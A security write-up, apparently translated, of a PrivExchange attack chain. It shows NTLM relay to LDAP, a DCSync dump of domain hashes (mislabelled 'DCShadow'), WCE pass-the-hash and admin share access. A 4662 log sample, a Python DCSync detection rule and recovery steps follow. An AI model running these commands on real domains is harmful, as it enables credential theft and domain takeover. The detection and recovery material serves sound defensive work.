When an Exchange vulnerability meets DCShadow
Introduction
In most organizations that run Active Directory and Exchange, the Exchange servers hold such high privileges that an administrator on an Exchange server is enough to escalate to Domain Admin. This article covers the exploitation method, the attack logs it leaves behind, and how to recover the affected accounts and permissions.
Attack notes
# Start the relay service
root@kali:/opt/impacket# python ntlmrelayx.py -t ldap://192.168.136.2 --escalate-user extest
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] User privileges found: Create user
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.136.4, attacking target ldap://192.168.136.2
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://192.168.136.2 as ONE\mail-01$ SUCCEED
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User extest now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue

# Attack Exchange
root@kali:/opt/PrivExchange# python privexchange.py -ah 192.168.135.88 mail.one.com -u extest -d one.corp
Password:
INFO: Using attacker URL: http://192.168.135.88/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful

# Use DCShadow to obtain the domain users' hashes
root@kali:/opt/impacket19# python secretsdump.py one/[email protected] -just-dc
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
one.corp\administrator:500:xxxxxxxxx:xxxxxxxxx:::
Guest:501:xxxxxxxxx:xxxxxxxxx:::
krbtgt:502:xxxxxxxxx:xxxxxxxxx:::
DefaultAccount:503:xxxxxxxxx:xxxxxxxxx:::
one.corp\ocsadmin:1110:xxxxxxxxx:xxxxxxxxx:::
one.corp\jack.ma:1138:xxxxxxxxx:xxxxxxxxx:::
one.corp\tong.wu:1142:xxxxxxxxx:xxxxxxxxx:::
one.corp\chongxin.cai:1143:xxxxxxxxx:xxxxxxxxx:::
one.corp\yongming.wu:1145:xxxxxxxxx:xxxxxxxxx:::
one.corp\changwei.ma:1147:xxxxxxxxx:xxxxxxxxx:::
one.corp\shan.dai:1152:xxxxxxxxx:xxxxxxxxx:::
one.corp\jianhang.jin:1153:xxxxxxxxx:xxxxxxxxx:::
……
Hash injection
# After obtaining the hashes, use wce to inject one and take over any account
C:\Users\C\Desktop\wce_v1_42beta_x32>wce -s changwei.ma:one.corp:xxxxxxxxx:xxxxxxxxx
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa ([email protected])
Use -h for help.

Changing NTLM credentials of current logon session (0008DE07h) to:
Username: changwei.ma
domain: one.corp
LMHash: xxxxxxxxx
NTHash: xxxxxxxxx
NTLM credentials successfully changed!

C:\Users\C\Desktop\wce_v1_42beta_x32>dir \\macw-pc\c$
 驅動器 \\macw-pc\c$ 中的卷是 Windows
 卷的序列號是 18A3-83B0

 \\macw-pc\c$ 的目錄

2018/04/12  週四 07:38    <DIR>          PerfLogs
2018/12/20  週四 14:08    <DIR>          Program Files
2019/01/16  週三 11:21    <DIR>          Program Files (x86)
2019/01/10  週四 10:32    <DIR>          Servyou
2018/11/29  週四 14:36    <DIR>          Users
2019/01/08  週二 15:15    <DIR>          Windows
               2 個檔案      33,165,918 位元組
               7 個目錄 188,092,211,200 可用位元組
Log analysis
{
  "computer_name": "DC06.one.corp",
  "event_data": {
    "AccessList": "%%7688\n\t\t\t\t",
    "AccessMask": "0x100",
    "AdditionalInfo": "-",
    "HandleId": "0x0",
    "ObjectName": "%{d0e4b839-7da5-4f94-8cb0-920f4ce499a9}",
    "ObjectServer": "DS",
    "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "OperationType": "Object Access",
    "Properties": "%%7688\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    "SubjectDomainName": "ONE",
    "SubjectLogonId": "0x3d857e",
    "SubjectUserName": "extest",
    "SubjectUserSid": "S-1-5-21-1528638276-348772823-1382602710-14867"
  },
  "event_id": 4662,
  "keywords": [ "稽核成功" ],
  "level": "資訊",
  "log_name": "Security",
  "opcode": "資訊",
  "process_id": 664,
  "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "record_number": "250045996",
  "source_name": "Microsoft-Windows-Security-Auditing",
  "task": "目錄服務訪問",
  "thread_id": 760,
  "type": "wineventlog"
}
// Alert on ObjectType or AccessList
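The alert rule suggested in the comment above, written out as an added example that is not part of the original post: it takes the 4662 event as JSON and flags Control Access on the domainDNS object whose Properties name a replication right, which is what the secretsdump -just-dc step (DRSUAPI replication, i.e. DCSync) produces on the DC. The DS-Replication-Get-Changes GUID is the standard right not present in the page's event, and the allowed_accounts list is an assumption for legitimate replication partners such as DC computer accounts.

```python
import json

# GUIDs from the 4662 event above: the domainDNS object class and the
# replication control-access rights that a DCSync request needs on the domain object.
DOMAIN_DNS_CLASS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",  # standard GUID, not in the page's event
}
CONTROL_ACCESS = "%%7688"  # resource string that renders as "Control Access" in AccessList

# Event copied from the log above (trimmed to the fields the rule uses).
SAMPLE_EVENT = json.loads(r'''{"computer_name": "DC06.one.corp", "event_data": {
 "AccessList": "%%7688\n\t\t\t\t", "AccessMask": "0x100", "ObjectServer": "DS",
 "ObjectName": "%{d0e4b839-7da5-4f94-8cb0-920f4ce499a9}",
 "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "OperationType": "Object Access",
 "Properties": "%%7688\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
 "SubjectDomainName": "ONE", "SubjectUserName": "extest"},
 "event_id": 4662, "log_name": "Security"}''')

def check_dcsync(event, allowed_accounts=()):
    """Return the replication rights named in a suspicious 4662 event, or [] if it is benign."""
    if event.get("event_id") != 4662:
        return []
    data = event.get("event_data", {})
    # Only Control Access on the domainDNS object itself matters for replication.
    if data.get("ObjectType", "").lstrip("%").lower() != DOMAIN_DNS_CLASS:
        return []
    if CONTROL_ACCESS not in data.get("AccessList", ""):
        return []
    # Known replication partners (assumption: DC computer accounts, AAD Connect) are allow-listed by name.
    if data.get("SubjectUserName", "") in allowed_accounts:
        return []
    props = data.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]

def scan(events, allowed_accounts=()):
    """Return (subject, rights) pairs for every event that should raise an alert."""
    alerts = []
    for ev in events:
        hits = check_dcsync(ev, allowed_accounts)
        if hits:
            alerts.append((ev["event_data"]["SubjectUserName"], hits))
    return alerts

if __name__ == "__main__":
    print(scan([SAMPLE_EVENT], allowed_accounts=("DC06$",)))  # DC06$ is a constructed allow-list entry
```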
Recovery
In the Properties > Security tab of the one.corp forest, an extra extest user appears holding the "Replicating Directory Changes" and "Replicating Directory Changes All" permissions. Remove those permissions and delete the extest user.